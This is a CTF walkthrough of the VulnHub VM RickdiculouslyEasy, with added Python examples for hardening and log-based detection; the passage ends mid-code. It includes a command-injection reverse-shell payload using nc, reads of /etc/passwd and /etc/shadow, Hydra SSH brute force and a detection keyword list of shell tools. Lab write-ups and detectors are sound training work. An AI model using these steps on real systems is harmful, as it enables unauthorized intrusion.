As mentioned in my previous article, I participated in a CTF competition. Part of that CTF competition included OSINT (Open-Source Intelligence) and penetration testing exercises. Today, I want to discuss penetration testing 101 in a CTF environment.
Pre-engagement
Pentesting in the real world starts with the pre-engagement phase. This phase involves engaging with the client to find out their goals, scope of work, etc. It’s different in a CTF environment. Some CTFs will give you the rules of engagement and possibly a topology. Others might not provide anything, and it’s up to you to figure it all out.
Know thy enemy
Reconnaissance plays a vital role in successful penetration testing. Without solid reconnaissance, there is a high chance that the pentest fails or takes longer than expected. The goal of reconnaissance is to gather information about possible entry points into the target system(s).
The definition of the reconnaissance phase will vary depending on where you get your information. In Cisco’s CCNP SCOR on-demand course, this phase includes both passive and active reconnaissance.
In passive reconnaissance, the attacker’s focus is to gather information about the target without interacting with it directly. That means gathering information from their favorite search engine, Shodan, whois records, etc.
In active reconnaissance, the attacker interacts directly with the target(s), typically by performing port scans, ping sweeps, vulnerability scans, etc. Because this interaction touches the target, it leaves a trail of the attack.
Exploiting vulnerabilities
Once you’ve identified the target system(s) and vulnerabilities, you are now ready to perform your attacks. The attacks will consist of web application attacks, network-based attacks, etc.
There are many tools available that you can use, such as Metasploit, Hydra, password cracking tools, etc. In a lot of cases, you are going to use a combination of tools to gain access.
Documentation and reporting
I haven’t heard of or participated in any CTF event where documentation and reporting are required. In the real world, the pentesting report and remediation plan are vital to the client. They may use them to meet compliance requirements and to improve their defenses.
A pentester in the real world will need to hone their documentation and presentation skills to communicate their findings and remediation plans. A CTF player won’t need to write any reports. The main objective is to capture the flag.
CTF walkthrough
The best way to learn is by example. That said, I suggest you download the same VM that I’m attacking so you can follow along. The VM I’m using for this demo is called RickdiculouslyEasy from VulnHub.
Note
I do not trust any of the VMs there. That said, I put them on a separate vSwitch with no hardware attached to it, which means no connectivity to my home network. I recommend you do something similar.
In the CTF competition that I participated in, there were a few targets. Since we had a diagram, we knew the IP addresses of the targets. However, I still performed a ping sweep to find out whether they were responding. There are two tools I use for this task, Nmap and fping, though I tend to use the latter for this purpose.
Nmap
I think the base install of Kali Linux includes Nmap. If not, it’s easy to install by issuing sudo apt install nmap -y. Once installed, enter the command below in the terminal to perform a ping sweep of the whole 172.16.20.0/24 subnet.
```
andrew@kali:~$ nmap -sn 172.16.20.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-23 19:48 PST
Nmap scan report for 172.16.20.1
Host is up (0.00029s latency).
Nmap scan report for 172.16.20.50
Host is up (0.00054s latency).
Nmap scan report for 172.16.20.51
Host is up (0.00025s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 15.63 seconds
```
The -sn flag disables the port scan, so Nmap only performs host discovery. There are many flags available, so hit the man page and read it. Alternatively, you can buy the Nmap book or read it online for free.
fping
I came across this tool long before I knew how to use Nmap. That said, I tend to use it a lot more than Nmap for ping sweeps. It is not in the default Kali Linux installation, so you have to add it by issuing sudo apt install fping -y. To perform a ping sweep of the same subnet as above, issue the command below.
```
andrew@kali:~$ fping -ga 172.16.20.0/24
172.16.20.1
172.16.20.50
172.16.20.51
ICMP Host Unreachable from 172.16.20.51 for ICMP Echo sent to 172.16.20.2
ICMP Host Unreachable from 172.16.20.51 for ICMP Echo sent to 172.16.20.2
ICMP Host Unreachable from 172.16.20.51 for ICMP Echo sent to 172.16.20.2
ICMP Host Unreachable from 172.16.20.51 for ICMP Echo sent to 172.16.20.2
<-- Output omitted for brevity -->
```
Let’s break down the command for those who are unfamiliar with the tool. The -g flag means that I want to specify either a start and end IP address or a target subnet. The -a flag means to show only the targets that are alive.
```
andrew@kali:~$ fping -ga 172.16.20.0/24 2> /dev/null
172.16.20.1
172.16.20.50
172.16.20.51
```
Depending on the version installed, the unreachable messages may not show up. Newer versions include them, so I tend to append 2> /dev/null to discard the error stream from the output, as shown in the second run.
Services running
Once you have a list of IP addresses, it’s time to find out the services they are running for a possible entry point(s). The well-known tool for this job is Nmap.
```
andrew@kali:~$ sudo nmap -A -T5 172.16.20.50 -p 1-65535
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-23 20:04 PST
Nmap scan report for 172.16.20.50
Host is up (0.00023s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              42 Aug 22  2017 FLAG.txt
|_drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:172.16.20.51
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh?
| fingerprint-strings:
|   NULL:
|_    Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp    open  http    Apache httpd 2.4.27 ((Fedora))
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.27 (Fedora)
|_http-title: Morty's Website
9090/tcp  open  http    Cockpit web service 161 or earlier
|_http-title: Did not follow redirect to https://172.16.20.50:9090/
13337/tcp open  unknown
| fingerprint-strings:
|   NULL:
|_    FLAG:{TheyFoundMyBackDoorMorty}-10Points
22222/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
|   2048 b4:11:56:7f:c0:36:96:7c:d0:99:dd:53:95:22:97:4f (RSA)
|   256 20:67:ed:d9:39:88:f9:ed:0d:af:8c:8e:8a:45:6e:0e (ECDSA)
|_  256 a6:84:fa:0f:df:e0:dc:e2:9a:2d:e7:13:3c:e7:50:a9 (ED25519)
60000/tcp open  unknown
| fingerprint-strings:
|   NULL, ibm-db2:
|_    Welcome to Ricks half baked reverse shell...
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.91%I=7%D=11/23%Time=5FBC8662%P=x86_64-pc-linux-gnu%r(NUL
SF:L,42,"Welcome\x20to\x20Ubuntu\x2014.04.5\x20LTS\x20(GNU/Linux\x204.
SF:4.0-31-generic\x20x86_64)\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port13337-TCP:V=7.91%I=7%D=11/23%Time=5FBC8662%P=x86_64-pc-linux-gnu%r(
SF:NULL,29,"FLAG:{TheyFoundMyBackDoorMorty}-10Points\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port60000-TCP:V=7.91%I=7%D=11/23%Time=5FBC8668%P=x86_64-pc-linux-gnu%r(
SF:NULL,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20reverse\x20shell.\
SF:..\n#\x20")%r(ibm-db2,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20r
SF:everse\x20shell...\n#\x20");
MAC Address: 00:0C:29:34:CE:AA (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.23 ms 172.16.20.50

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.92 seconds
```
If you are following along, you should see similar or the same output as mine. As you can see, we’ve successfully determined the open ports and some information about the services that are running. Additionally, we found some flags.
Flag #1 – 10 Points
TheyFoundMyBackDoorMorty
Let’s break down the Nmap syntax. The -A flag enables OS detection, service version detection, script scanning, and traceroute. The -T5 flag speeds up the scan. The -p 1-65535 option tells Nmap to scan every port from 1 to 65535.
Note
In the real world, you wouldn’t want to use the -T5 flag. It’s aggressive and may trigger an IDS/IPS/NGFW to block your host. I’ve also heard that it can crash either the service or the server. Also, you may not want to run script scanning if the client specifically asked for a vulnerability assessment.
FTP – Port 21
From our Nmap scan result, the built-in script scanning was able to identify that the server allows anonymous FTP logins. On top of that, it performed a directory listing, which revealed that the share contains a flag.
To get the flag, I used the curl command. Alternatively, you can use an FTP client to download and view the file.
```
andrew@kali:~$ curl ftp://anonymous@172.16.20.50/FLAG.txt
FLAG{Whoa this is unexpected} - 10 Points
```
Flag #2 – 10 Points
Whoa this is unexpected
Port 22
As many IT professionals know, port 22 is the default port for the SSH service. However, our Nmap scan couldn’t identify it as such, so it’s reasonable to assume it isn’t running an SSH service. We can always verify that.
```
andrew@kali:~$ nc 172.16.20.50. 22
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
whoami
^C
```
Nothing happened when we issued a command, so we probably should move on.
HTTP – Port 80
From our Nmap scan result, we can tell that it is indeed running a web server. You can use Firefox or curl for this task. I used the curl command below.
```
andrew@kali:~$ curl 172.16.20.50
<!DOCTYPE html>
<html>
<head>
<title>Morty's Website</title>
<center><font size="20" color="yellow"><b>MORTY'S COOL WEBSITE</b></font></center>
<center><font size = "5" color="yellow">It's not finished yet ok. Stop judging me.</font></center>
<style>
body {
  background-image: url("morty.png");
}
</style>
</head>
</html>
```
There’s no flag showing up as text, so it might be worth skipping this for now. While some CTF challenges hide the flag using steganography, we don’t want to analyze the morty.png file yet. We can always come back to it later, since we’re not done with our reconnaissance just yet.
Directory scanning
One of the things I learned from a penetration testing course, which I have yet to finish, is web directory scanning. Kali Linux should have two tools installed: dirb (CLI) and dirbuster (GUI).
```
andrew@kali:~$ dirb http://172.16.20.50/
<-- Output omitted for brevity -->
---- Scanning URL: http://172.16.20.50/ ----
+ http://172.16.20.50/cgi-bin/ (CODE:403|SIZE:217)
+ http://172.16.20.50/index.html (CODE:200|SIZE:326)
==> DIRECTORY: http://172.16.20.50/passwords/
+ http://172.16.20.50/robots.txt (CODE:200|SIZE:126)

---- Entering directory: http://172.16.20.50/passwords/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Wed Nov 25 06:13:09 2020
DOWNLOADED: 4612 - FOUND: 3
```
Another tool that you can use is gobuster, which you need to install manually.
```
andrew@kali:~$ sudo apt install gobuster -y
<-- Output omitted for brevity -->
andrew@kali:~$ gobuster dir -u http://172.16.20.50 -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
<-- Output omitted for brevity -->
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/cgi-bin/ (Status: 403)
/index.html (Status: 200)
/passwords (Status: 301)
/robots.txt (Status: 200)
===============================================================
2020/11/24 20:02:45 Finished
===============================================================
```
For this scenario, it doesn’t matter which one you use. Both tools discovered files and directories that are useful for finding the flags. For example, both of them found a passwords directory. Let’s look in there to see what’s in it.
```
andrew@kali:~$ curl http://172.16.20.50/passwords/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /passwords</title>
 </head>
 <body>
<h1>Index of /passwords</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a> </td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="FLAG.txt">FLAG.txt</a> </td><td align="right">2017-08-22 02:31 </td><td align="right"> 44 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="passwords.html">passwords.html</a> </td><td align="right">2017-08-23 19:51 </td><td align="right">352 </td><td> </td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
</body></html>
```
We found another flag. Let’s use the curl command again to display it.
```
andrew@kali:~$ curl http://172.16.20.50/passwords/FLAG.txt
FLAG{Yeah d- just don't do it.} - 10 Points
```
Flag #3 – 10 Points
Yeah d- just don’t do it.
We still have an interesting passwords.html file, so let’s take a look at that. Again, let’s use curl to display the HTML file.
```
andrew@kali:~$ curl http://172.16.20.50/passwords/passwords.html
<!DOCTYPE html>
<html>
<head>
<title>Morty's Website</title>
<body>Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need.</body>
<!--Password: winter-->
</head>
</html>
```
It seems like we found a password, but we don’t have a username just yet. Let’s put that in our back pocket and come back to it later when we find at least a username.
We know that we have a cgi-bin directory, but we don’t know what’s in it. So, let’s move on to the robots.txt file.
```
andrew@kali:~$ curl http://172.16.20.50/robots.txt
They're Robots Morty! It's ok to shoot them! They're just Robots!

/cgi-bin/root_shell.cgi
/cgi-bin/tracertool.cgi
/cgi-bin/*
```
Finally, we found the names of the scripts in the cgi-bin folder. Let’s check what’s in them.
```
andrew@kali:~$ curl http://172.16.20.50/cgi-bin/root_shell.cgi
<html><head><title>Root Shell </title></head>
--UNDER CONSTRUCTION--
<!--HAAHAHAHAAHHAaAAAGGAgaagAGAGAGG-->
<!--I'm sorry Morty. It's a bummer.-->
</html>
andrew@kali:~$ curl http://172.16.20.50/cgi-bin/tracertool.cgi
<html><head><title>Super Cool Webpage </title></head>
<b>MORTY'S MACHINE TRACER MACHINE</b>
<br>Enter an IP address to trace.</br>
<form action=/cgi-bin/tracertool.cgi method="GET">
<textarea name="ip" cols=40 rows=4>
</textarea>
<input type="submit" value="Trace!">
</form>
```
The root_shell.cgi page is a dead end, so we’ll concentrate on the tracertool.cgi page.
Command Injection
When you visit the URL, you will see a simple web application that performs a traceroute to the IP address that you entered. I’m familiar with the injection attack because of the security-related courses I’ve taken.

From an attacker’s perspective, any input form is an attack opportunity. That said, we’re going to attempt a command injection attack. Essentially, we just append extra shell syntax to the end of the expected input.

Let’s try to eliminate the first half of our request to see what happens.

If you’re following along, you will notice that it takes a bit of time for the app to process our input. Not ideal when you’re in a time-bounded CTF. We can choose to continue using this web app, or we can attempt to establish a reverse shell.
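To show where this weakness comes from, here is an added example of the unsafe pattern a script like tracertool.cgi typically relies on, next to a hardened handler. This is illustrative code written for this walkthrough, not the VM’s own CGI (whose source we never see); it assumes the script takes an ip query parameter and runs traceroute on it, and every function name below is mine.

```python
"""Added example (not the VM's CGI, whose source this post never shows): the
shell-string pattern that makes a script like tracertool.cgi injectable, next
to a hardened handler. Assumed: the script takes an 'ip' query parameter and
runs traceroute on it; all function names here are illustrative."""
import ipaddress
import subprocess
from typing import List
from urllib.parse import parse_qs


def _ip_param(query_string: str) -> str:
    # parse_qs URL-decodes, so '%3B' arrives as ';' and '+' as a space
    return parse_qs(query_string).get("ip", [""])[0]


def build_vulnerable_command(query_string: str) -> str:
    """The unsafe pattern: the user's value is pasted into one command string
    handed to /bin/sh. Returned rather than executed so it can be inspected:
    a ';' in the value ends traceroute's arguments and starts a second command."""
    return f"traceroute {_ip_param(query_string)}"


def build_hardened_command(query_string: str) -> List[str]:
    """Two independent controls. First, the value must parse as an IP address
    (ValueError otherwise), which rejects every shell metacharacter before
    anything runs. Second, the command is an argv list run without a shell, so
    even a value that slipped through would reach traceroute as one literal
    argument instead of being interpreted."""
    addr = ipaddress.ip_address(_ip_param(query_string).strip())
    if addr.is_loopback or addr.is_link_local or addr.is_multicast:
        raise ValueError(f"refusing to trace {addr}")
    return ["traceroute", str(addr)]


def run_hardened(query_string: str, timeout: int = 60) -> str:
    """Run the validated argv with no shell involved (needs the traceroute
    binary; the checks below only exercise the two builders)."""
    proc = subprocess.run(build_hardened_command(query_string),
                          capture_output=True, text=True, timeout=timeout)
    return proc.stdout
```

Feeding the payload used later in this post through both builders makes the difference concrete: the vulnerable one hands the shell two commands, the hardened one raises before anything runs.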
Reverse Shell
There are many ways to establish a reverse shell. In this instance, let’s use a familiar tool that we used earlier, and that is Netcat.
For this to work, the attacker must set up a listener port. The listener port will accept the connection from the victim’s machine.
To set up a listener port on our Kali Linux instance, issue the nc -lvp 53 command. You should see something similar to what is shown below.
```
andrew@kali:~$ nc -lvp 53
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::53
Ncat: Listening on 0.0.0.0:53
```
The -l flag tells Netcat to listen for incoming connections. The -v flag sets verbose mode. The -p flag specifies the port, which in listen mode is the port we listen on.
On Morty’s Super Cool Webpage, enter ; nc 172.16.20.52 53 -e /bin/bash as the input.

After nc, you need to enter the IP address and port that match your Kali Linux machine. The -e flag executes the given program once the connection is made. In this case, we want /bin/bash to run.
You should notice on your Kali Linux machine that the reverse shell connection was successful.
```
andrew@kali:~$ nc -lvp 53
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::53
Ncat: Listening on 0.0.0.0:53
Ncat: Connection from 172.16.20.50.
Ncat: Connection from 172.16.20.50:47182.
whoami
apache
```
This shell, however, is not fully interactive. We can attempt to upgrade it to a fully interactive one by issuing the command shown below.
```
python -c 'import pty; pty.spawn("/bin/bash")'
```
In this case, nothing happened. You can attempt other ways to get an interactive shell, but in this instance, I’m going to skip it.
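From the defender’s side, every request to tracertool.cgi went through Apache as a GET, so the injected ip value (semicolon, nc and all) is sitting in the web server’s access log. The following is an added detection example, not part of the original walkthrough, that flags such requests; the three log lines are constructed for the example.

```python
"""Added detection example (not from the original post): flag command-injection
attempts against tracertool.cgi in Apache access logs. Because the form submits
with GET, the injected 'ip' value lands in the request line of access_log.
The log lines below are constructed for the example."""
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format: client ident user [time] "request" status bytes "referer" "agent"
ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
# Shell separators and substitution characters that have no business in an IP field.
SHELL_META_RE = re.compile(r"[;&|`$<>(){}\n]")
# Programs commonly chained onto an injected command; this post's payload uses nc.
SUSPICIOUS_BIN_RE = re.compile(r"\b(nc|ncat|bash|sh|python|perl|wget|curl)\b")

SAMPLE_LOG = """\
172.16.20.52 - - [24/Nov/2020:20:15:01 -0800] "GET /cgi-bin/tracertool.cgi?ip=172.16.20.1 HTTP/1.1" 200 612 "-" "Mozilla/5.0"
172.16.20.52 - - [24/Nov/2020:20:15:40 -0800] "GET /cgi-bin/tracertool.cgi?ip=%3B+nc+172.16.20.52+53+-e+%2Fbin%2Fbash HTTP/1.1" 200 340 "-" "Mozilla/5.0"
172.16.20.52 - - [24/Nov/2020:20:16:02 -0800] "GET /robots.txt HTTP/1.1" 200 126 "-" "curl/7.72.0"
"""


def inspect_request(line: str):
    """Return a finding dict for one access-log line, or None if it looks benign."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if not parts.path.startswith("/cgi-bin/"):
        return None                      # only the CGI handlers feed parameters to a shell
    for param, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:             # parse_qs already decoded %3B -> ';' and '+' -> ' '
            reasons = []
            if SHELL_META_RE.search(value):
                reasons.append("shell metacharacter")
            bins = SUSPICIOUS_BIN_RE.findall(value)
            if bins:
                reasons.append("invokes " + ", ".join(sorted(set(bins))))
            if reasons:
                return {"src": m["src"], "time": m["time"], "path": parts.path,
                        "param": param, "value": value, "reasons": reasons}
    return None


def scan_log(text: str):
    """Run inspect_request over every line and collect the findings."""
    return [f for f in (inspect_request(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['src']} {f['path']} {f['param']}={f['value']!r}: "
              + "; ".join(f["reasons"]))
```

Had the form used POST, the body would not appear in access_log and this check would need a request-body log (mod_security or similar) instead.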
Searching for usernames
Let’s view the contents of /etc/passwd and /etc/shadow, since we need some usernames and password hashes.
```
cat /etc/passwd;cat /etc/shadow
<-- ASCII art printed instead of the file contents; output omitted for brevity -->
```
Pretty ASCII art! It looks like the cat command isn’t working. Let’s try a different command to view the contents of both files.
The head command displays the first part of a file. Let’s use that utility to see if we can view the contents of both files.
```
head -n 100 /etc/passwd | grep -v nologin ; head -n 100 /etc/shadow
root:x:0:0:root:/root:/bin/bash
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash
```
Let’s break down the first part of the syntax that I issued. The -n 100 option specifies that I want to show only the first 100 lines of the file. The grep -v nologin part means that I don’t want to see any lines containing nologin. The semicolon allows us to execute a series of commands in a single prompt.
We didn’t see anything for /etc/shadow, so we probably don’t have the privileges to view the file. That’s okay, since we have the password that we found earlier.
SSH – Port 22222
We now have usernames and possibly a password for one of the users. Let’s launch an SSH brute force attack. There are two ways of doing this with Hydra: manually trying each username with the same password, or supplying a username list. I opted for the latter.
Since I opted for a username list, I created a text file in my home directory.
```
andrew@kali:~$ cat user.txt
root
RickSanchez
Morty
Summer
```
Now, I’m ready to launch an SSH brute force attack using Hydra.
```
andrew@kali:~$ hydra -L user.txt -p winter ssh://172.16.20.50:22222
<-- Output omitted for brevity -->
[22222][ssh] host: 172.16.20.50   login: Summer   password: winter
1 of 1 target successfully completed, 1 valid password found
<-- Output omitted for brevity -->
```
Our SSH brute force attack was successful! We can use Summer’s account to SSH to our target machine.
Note
The password is in the RockYou wordlist. We could’ve used that wordlist for our brute force attack. However, this is faster.
Before we move on, let’s break down the syntax that I used. The -L flag means that you want to use a list of usernames. The -p flag means that you want to try the single password winter against our user list.
```
andrew@kali:~$ ssh Summer@172.16.20.50 -p 22222
Summer@172.16.20.50's password:
There was 1 failed login attempt since the last successful login.
Last login: Wed Aug 23 19:20:29 2017 from 192.168.56.104
```
Let’s see what files she has in her home directory.
```
[Summer@localhost ~]$ ls -l
total 4
-rw-rw-r--. 1 Summer Summer 48 Aug 22  2017 FLAG.txt
```
We found another flag! Let’s see what the flag is.
```
[Summer@localhost ~]$ head -n 100 FLAG.txt
FLAG{Get off the high road Summer!} - 10 Points
```
Flag #4 – 10 Points
Get off the high road Summer!
Poking around
Let’s keep poking around to see what else we can do with our access. The idea here is to get more flags and root access.
```
[Summer@localhost ~]$ ls -l /etc/shadow ; ls -l /home/root ; ls -l /home/Morty; ls -l /home/RickSanchez
----------. 1 root root 1205 Aug 23  2017 /etc/shadow
ls: cannot access '/home/root': No such file or directory
total 48
-rw-r--r--. 1 root root   414 Aug 22  2017 journal.txt.zip
-rw-r--r--. 1 root root 43145 Aug 22  2017 Safe_Password.jpg
total 0
drwxr-xr-x. 2 RickSanchez RickSanchez 18 Sep 21  2017 RICKS_SAFE
drwxrwxr-x. 2 RickSanchez RickSanchez 26 Aug 18  2017 ThisDoesntContainAnyFlags
```
We can’t perform password cracking since we don’t have access to the shadow file. But we do have access to some files and directories that may give us more clues.
Let’s start with Morty’s JPEG and ZIP files.
```
[Summer@localhost ~]$ unzip /home/Morty/journal.txt.zip
Archive:  /home/Morty/journal.txt.zip
[/home/Morty/journal.txt.zip] journal.txt password:
   skipping: journal.txt             incorrect password
```
We need a password for the ZIP file. I don’t have a password aside from winter, so we need to look for some more clues.
Since we found an image, let’s see what we can do with the JPEG file. One of the things I learned during our internal CTF is steganography analysis. That said, we need to analyze the image file.
Steganography
The strings command is one of the tools I learned to use when performing steganography analysis. Let’s try it out and see.
```
[Summer@localhost ~]$ strings -n 20 /home/Morty/Safe_Password.jpg
-bash: strings: command not found
```
The command is not available on this machine. Let’s transfer the file to our Kali Linux machine and analyze it there.
```
andrew@kali:~$ scp -P 22222 Summer@172.16.20.50:/home/Morty/Safe_Password.jpg .
Summer@172.16.20.50's password:
Safe_Password.jpg                             100%   42KB   9.0MB/s   00:00
```
Now, we’re not limited to the target machine’s installed packages. Let’s go ahead and issue the same command we used earlier.
```
andrew@kali:~$ strings -n 20 Safe_Password.jpg
8 The Safe Password: File: /home/Morty/journal.txt.zip. Password: Meeseek
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
```
It seems that we found the ZIP file’s password. The -n flag specifies the minimum string length to display.
Now, let’s unzip the file using the password we just found.
```
[Summer@localhost ~]$ unzip /home/Morty/journal.txt.zip
Archive:  /home/Morty/journal.txt.zip
[/home/Morty/journal.txt.zip] journal.txt password:
  inflating: journal.txt
```
As suspected, it worked. Now, let’s see what’s in it.
```
[Summer@localhost ~]$ head -n 100 journal.txt
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe? Anyway. Here it is:

FLAG: {131333} - 20 Points
```
We found another flag! At this point, we’re at 60 points.
Flag #5 – 20 Points
131333
Poking around some more
At this point, we can move on to RickSanchez’s files. Let’s look at the first directory, called RICKS_SAFE.
```
[Summer@localhost ~]$ ls -l /home/RickSanchez/RICKS_SAFE/
total 12
-rwxr--r--. 1 RickSanchez RickSanchez 8704 Sep 21  2017 safe
```
It seems that the file is an executable, and we don’t have the privilege to run it. Let’s copy the file to Summer’s home directory and run it from there.
```
[Summer@localhost ~]$ cp /home/RickSanchez/RICKS_SAFE/safe .
[Summer@localhost ~]$ chmod 777 safe
[Summer@localhost ~]$ ./safe
Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!
```
It’s talking about command line arguments, so we need to add something at the end for the executable to run correctly. If we go back and read Morty’s journal entry, it’s talking about Rick’s safe or password. Let’s try it out.
```
[Summer@localhost ~]$ ./safe 131333
decrypt: 	FLAG{And Awwwaaaaayyyy we Go!} - 20 Points

Ricks password hints:
 (This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order


1 uppercase character
1 digit
One of the words in my old bands name.
```
We found another flag, and it’s giving us a hint for getting Rick’s password. It’s also talking about sudo, so that may be our way to get root access.
Flag #6 – 20 Points
And Awwwaaaaayyyy we Go!
Generating a wordlist
I’ve always used RockYou and other ready-made wordlists but never generated a custom one. With that said, I had to use a search engine to find out how to perform this task. I found out that crunch is one of the tools for it.
We’ll use this command line tool to generate wordlists based on the clue. According to the clue, we need one uppercase letter, one digit, and one of the words in Rick’s old band’s name. I’ve never watched the Rick & Morty show, so I had to use a search engine again. I found out that the name of the band is The Flesh Curtains.
I read a bit of crunch’s man page and other tutorials on the web. From my understanding, we need to use -t ,% for the first part of the password and add each word of the band’s name separately.
```
andrew@kali:~$ crunch 5 5 -t ,%The > the.txt
<-- Output omitted for brevity -->
Crunch will now generate the following number of lines: 260
andrew@kali:~$ crunch 7 7 -t ,%Flesh > flesh.txt
<-- Output omitted for brevity -->
Crunch will now generate the following number of lines: 260
andrew@kali:~$ crunch 10 10 -t ,%Curtains > curtains.txt
<-- Output omitted for brevity -->
Crunch will now generate the following number of lines: 260
```
The first and second values after crunch are the minimum and maximum length of the password. The -t ,% pattern specifies that we want an uppercase character and a digit as the first two characters of the password, before The. That means the first password in our list will be A0The, and the last will be Z9The.
Another SSH brute force attack
Now that we have the wordlists, we’re ready to launch another brute force attack against Rick’s account. Same as above, we’re going to use Hydra to perform this task for us.
```
andrew@kali:~$ hydra -l RickSanchez -P the.txt ssh://172.16.20.50:22222 -t 64
<-- Output omitted for brevity -->
1 of 1 target completed, 0 valid password found
andrew@kali:~$ hydra -l RickSanchez -P flesh.txt ssh://172.16.20.50:22222 -t 64
<-- Output omitted for brevity -->
1 of 1 target completed, 0 valid password found
andrew@kali:~$ hydra -l RickSanchez -P curtains.txt ssh://172.16.20.50:22222 -t 64
<-- Output omitted for brevity -->
[22222][ssh] host: 172.16.20.50   login: RickSanchez   password: P7Curtains
1 of 1 target successfully completed, 1 valid password found
```
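Both Hydra runs in this walkthrough (the single password sprayed across user.txt earlier, and the three wordlists against RickSanchez here) leave a distinctive trail in the target’s sshd log. The following added example, not from the original post, parses constructed /var/log/secure-style lines (the target is a Fedora box) and tells a password spray apart from a single-account brute force, also listing accounts that logged in after the failures.

```python
"""Added detection example (not from the original post): find the two Hydra
runs of this walkthrough in the target's sshd log. The first run sprays one
password across a user list; the second hammers one account with a wordlist.
The log lines are constructed for the example in /var/log/secure style."""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List

SSHD_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+ ssh2$"
)

# Constructed sample: 21:10 is the user-list spray, 21:40 the wordlist run
# against RickSanchez, 22:05 a legitimate user mistyping once.
SAMPLE_LOG = """\
Nov 24 21:10:01 localhost sshd[2101]: Failed password for root from 172.16.20.52 port 40122 ssh2
Nov 24 21:10:01 localhost sshd[2102]: Failed password for RickSanchez from 172.16.20.52 port 40124 ssh2
Nov 24 21:10:02 localhost sshd[2103]: Failed password for Morty from 172.16.20.52 port 40126 ssh2
Nov 24 21:10:02 localhost sshd[2104]: Accepted password for Summer from 172.16.20.52 port 40128 ssh2
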